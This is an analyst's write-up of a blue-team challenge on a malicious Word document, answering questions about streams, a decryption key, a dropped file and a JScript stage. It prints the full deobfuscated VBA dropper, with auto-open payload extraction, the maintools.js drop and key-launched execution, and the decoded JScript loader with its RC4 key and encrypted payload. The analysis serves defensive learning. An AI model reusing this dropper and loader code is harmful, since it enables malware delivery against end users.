Scenario

While working as a SOC analyst, you may encounter alerts from the enterprise Endpoint Detection and Response (EDR) system regarding unusual activity on an end-user machine. In one instance, a user reported receiving an email containing a DOC file from an unknown sender. The user subsequently submitted the document for analysis to ensure it does not pose a security risk.

Question 1

What is the SHA256 hash of the DOC file?

Answer 1

A simple shasum command in terminal provides the answer:

└─$ shasum -a 256 document                      
ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751  document

Question 2

Multiple streams contain macros in this document. Provide the number of the lowest one.

Answer 2

I am using a new tool that I have not used before to answer this question. OleDump.py.

I ran the tool on the document and got the following:

└─$ python3 oledump.py document
  1:       114 '\x01CompObj'
  2:       284 '\x05DocumentSummaryInformation'
  3:       392 '\x05SummaryInformation'
  4:      8017 '1Table'
  5:      4096 'Data'
  6:       483 'Macros/PROJECT'
  7:        65 'Macros/PROJECTwm'
  8: M    7117 'Macros/VBA/Module1'
  9: m    1104 'Macros/VBA/ThisDocument'
 10:      3467 'Macros/VBA/_VBA_PROJECT'
 11:      2964 'Macros/VBA/__SRP_0'
 12:       195 'Macros/VBA/__SRP_1'
 13:      2717 'Macros/VBA/__SRP_2'
 14:       290 'Macros/VBA/__SRP_3'
 15:       565 'Macros/VBA/dir'
 16:        76 'ObjectPool/_1541577328/\x01CompObj'
 17: O   20301 'ObjectPool/_1541577328/\x01Ole10Native'
 18:      5000 'ObjectPool/_1541577328/\x03EPRINT'
 19:         6 'ObjectPool/_1541577328/\x03ObjInfo'
 20:    133755 'WordDocument'

It shows 20 data streams. I can there are a few VBA macros in the file. The 8th data stream that is marked with an M means a macro with attributes according to the manual. Meaning 8 is the answer for this question.

Overview of indicators:
 M: Macro (attributes and code)
 m: macro (attributes without code)
 E: Error (code that throws an error when decompressed)
 !: Unusual macro (code without attributes)
 O: object (embedded file)
 .: storage
 R: root entry

Question 3

What is the decryption key of the obfuscated code?

Answer 3

I need to now dig deeper into the data stream. So first I will have to select the data stream and use the vbadecompress tool to view the code in said stream.

└─$ python3 oledump.py -s 8 -v document > code.bin

Using the above command I output the data stream to a file when I then opened in sublime to start deobfuscate the code. I did have to change the file type to .vbs in order to get syntax, which makes it a little easier to read.

I could put this into an LLM to make this quicker, but I really enjoy going through the code and changing the variables to make sense of the code myself.

Below is the code that I have mostly deofuscated and left some comments about what I think most parts do.

Attribute VB_Name = "Module1"
Public String_1 As String
Public String_2 As String

'Function 1 takes a byte and a long value and is a boolean'
'There is a single function here and its this one'
Function Function_1(Byte_Array_1() As Byte, Long_1 As Long) As Boolean

'byte 2 is set to 45'
Dim Byte_2 As Byte
Byte_2 = 45

For i = 0 To Long_1 - 1
Byte_Array_1(i) = Byte_Array_1(i) Xor Byte_2
Byte_2 = ((Byte_2 Xor 99) Xor (i Mod 254))
Next i

Function_1 = True
End Function


Sub AutoClose()
On Error Resume Next
Kill String_1
On Error Resume Next

Set Object_1 = CreateObject("Scripting.FileSystemObject")
Object_1.DeleteFile String_2 & "\*.*", True
Set Object_1 = Nothing

End Sub

Sub AutoOpen()

On Error GoTo Error_Handler

Dim FreeFile_1
Dim Long_2 As Long
Dim Long_1 As Long

'Long_2 is set to the length of the current file in bytes'
Long_2 = FileLen(ActiveDocument.FullName)

FreeFile_1 = FreeFile
Open (ActiveDocument.FullName) For Binary As #FreeFile_1
Dim Byte_3() As Byte

'turns Byte_3 into a Long with the value of the file length of the active documents full name'
ReDim Byte_3(Long_2)
Get #FreeFile_1, 1, Byte_3

Dim String_3 As String
'Takes the file name legnth in bytes and turns it into UFT32 Unicode'
String_3 = StrConv(Byte_3, vbUnicode)

Dim Dim_1, Dim_2
Dim Dim_3
'Dim_3 is a regular expression with the value starting with Mx0H8, set by the .pattern'
Set Dim_3 = CreateObject("vbscript.regexp")
Dim_3.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"

'Exectue works like replace, it returns with a Matchs Collection Object, which can contain 0 or more Match Objects.'
'Properties of this are read only'
'so determines if String_3 and Dim_3's pattern are the same and returns it to Dim_2'
Set Dim_2 = Dim_3.Execute(String_3)

Dim Dim_4
If Dim_2.Count = 0 Then
GoTo Error_Handler
End If

For Each Dim_1 In Dim_2
Dim_4 = Dim_1.FirstIndex
Exit For

Next
Dim Byte_Array_2() As Byte
Dim Long_3 As Long
Long_3 = 16827
'Byte_Array_2 turns into a Long array?'
ReDim Byte_Array_2(Long_3)

Get #FreeFile_1, Dim_4 + 81, Byte_Array_2
If Not Function_1(Byte_Array_2(), Long_3 + 1) Then
GoTo Error_Handler
End If

'checks the environment if there is a folder appdata, to check to see if the infected machine is running windows'
String_2 = Environ("appdata") & "\Microsoft\Windows"
Set Object_1 = CreateObject("Scripting.FileSystemObject")
If Not Object_1.FolderExists(String_2) Then
String_2 = Environ("appdata")
End If


Set Object_1 = Nothing
Dim Free_File_2
Free_File_2 = FreeFile

'Sets/creates String_1 to appdata\Microsoft\Windows\maintools.js'
String_1 = String_2 & "\" & "maintools.js"
'Opens String_1 to edit'
Open (String_1) For Binary As #Free_File_2

'Put writes to the file, so it writes to Free_File_2, the 1 is an optional parameter for where to start(?). Then it writes the Byte_Array_2 to the file'
'Byte_Array_2:
'First document name as an int (FreeFile_1). 
'then Dim_4 + 81 (I don't know what Set Dim_2 = Dim_3.Execute(String_3) is yet, so idk, it could just be 1 or 0 then + 81.)
'I am not 100% sure about this section'

Put #Free_File_2, 1, Byte_Array_2
Close #Free_File_2
Erase Byte_Array_2


'creates a shell script and runs maintools.js with the key: EzZETcSXyKAdF_e5I2i1'
Set Shell_Script = CreateObject("WScript.Shell")
Shell_Script.Run """" + String_1 + """" + " EzZETcSXyKAdF_e5I2i1"
ActiveDocument.Save
Exit Sub

Error_Handler:
Close #Free_File_2
ActiveDocument.Save

End Sub

Here are some notes I wrote down about the different operators, I have never used VBScript before so this was a learning experience for me:

They key is: EzZETcSXyKAdF_e5I2i1

I am still quite new to this, but I really enjoy breaking down code.

Question 4:

What is the name of the dropped file?

Answer 4:

From the above code that I have commented, String_1 is set to the file name maintools.js.

'Sets/creates String_1 to appdata\Microsoft\Windows\maintools.js'
String_1 = String_2 & "\" & "maintools.js"
'Opens String_1 to edit'
Open (String_1) For Binary As #Free_File_2

Question 5:

This script uses what language?

Answer 5:

As its dropping a .js file, which the malicious code is inside. It easy to determine that the code is jscript.

Question 6:

What is the name of the variable that is assigned the command-line arguments?

Answer 6:

For the life of me I couldn’t find a way of getting the maintools.js file from the document without detonating it. So I looked around online and just ended up uploading it to Hybrid Analysis. From there I looked at the strings that it found and got the answer: wvy1.

Question 7:

How many command-line arguments does this script expect?

Answer 7:

Going back to the documents macro, I can see that it only takes the single argument. That being the key.

'creates a shell script and runs maintools.js with the key: EzZETcSXyKAdF_e5I2i1'
Set Shell_Script = CreateObject("WScript.Shell")
Shell_Script.Run """" + String_1 + """" + " EzZETcSXyKAdF_e5I2i1"
ActiveDocument.Save
Exit Sub

Question 8:

What instruction is executed if this script encounters an error?

Answer 8:

Looking again through the Hybrid Analysis extracted strings, I can see that there is a catch statement that leads to the following:

}catch (e)
{WScript.Quit();}

Question 9:

What function returns the next stage of code (i.e. the first round of obfuscated code)?

Answer 9:

At this point I needed to see the contents of the maintools.js file. I went searching around and looked through the main guide for help. Using the code for the decryption after grabbing the payload I was able to get the following:

try{var wvy1 = WScript.Arguments;var ssWZ = wvy1(0);var ES3c = y3zb();ES3c = LXv5(ES3c);ES3c = CpPT(ssWZ,ES3c);eval(ES3c);  
}catch (e)
{WScript.Quit();}

function MTvK(CgqD){var XwH7 = CgqD.charCodeAt(0);if (XwH7 === 0x2B || XwH7 === 0x2D) return 62
if (XwH7 === 0x2F || XwH7 === 0x5F) return 63
 if (XwH7 < 0x30) return -1
  if (XwH7 < 0x30 + 10) return XwH7 - 0x30 + 26 + 26
   if (XwH7 < 0x41 + 26) return XwH7 - 0x41
    if (XwH7 < 0x61 + 26) return XwH7 - 0x61 + 26
   }

  function LXv5(d27x)

  {var LUK7 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;var j;var n6T8;if (d27x.length % 4 > 0)
  return;var CHlB = d27x.length;var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) === '=' ? 1 : 0
  var mjqo = new Array(d27x.length * 3 / 4 - V8eR);var z8Ht = V8eR > 0 ? d27x.length - 4 : d27x.length;var t2JG = 0;

  function XGH6 (b0tQ){mjqo[t2JG++] = b0tQ;}for (i = 0,j = 0; i < z8Ht; i += 4,j += 3){n6T8 = (MTvK(d27x.charAt(i)) << 18) | (MTvK(d27x.charAt(i + 1)) << 12) | (MTvK(d27x.charAt(i + 2)) << 6) | MTvK(d27x.charAt(i + 3));XGH6((n6T8 & 0xFF0000) >> 16)
  XGH6((n6T8 & 0xFF00) >> 8)
  XGH6(n6T8 & 0xFF)
 }if (V8eR === 2){n6T8 = (MTvK(d27x.charAt(i)) << 2) | (MTvK(d27x.charAt(i + 1)) >> 4)
 XGH6(n6T8 & 0xFF)
}else if (V8eR === 1){n6T8 = (MTvK(d27x.charAt(i)) << 10) | (MTvK(d27x.charAt(i + 1)) << 4) | (MTvK(d27x.charAt(i + 2)) >> 2)
XGH6((n6T8 >> 8) & 0xFF)
XGH6(n6T8 & 0xFF)
}return mjqo
}

function CpPT(bOe3,F5vZ)
{var AWy7 = [];var V2Vl = 0;var qyCq;var mjqo = '';for (var i = 0; i < 256; i++)
{AWy7[i] = i;}for (var i = 0; i < 256; i++)
{V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyCq;}var i = 0;var V2Vl = 0;for (var y = 0; y < F5vZ.length; y++)
{i = (i + 1) % 256;V2Vl = (V2Vl + AWy7[i]) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyCq;mjqo += String.fromCharCode(F5vZ[y] ^ AWy7[(AWy7[i] + AWy7[V2Vl]) % 256]);}return mjqo;}

function y3zb()
{var qGxZ = "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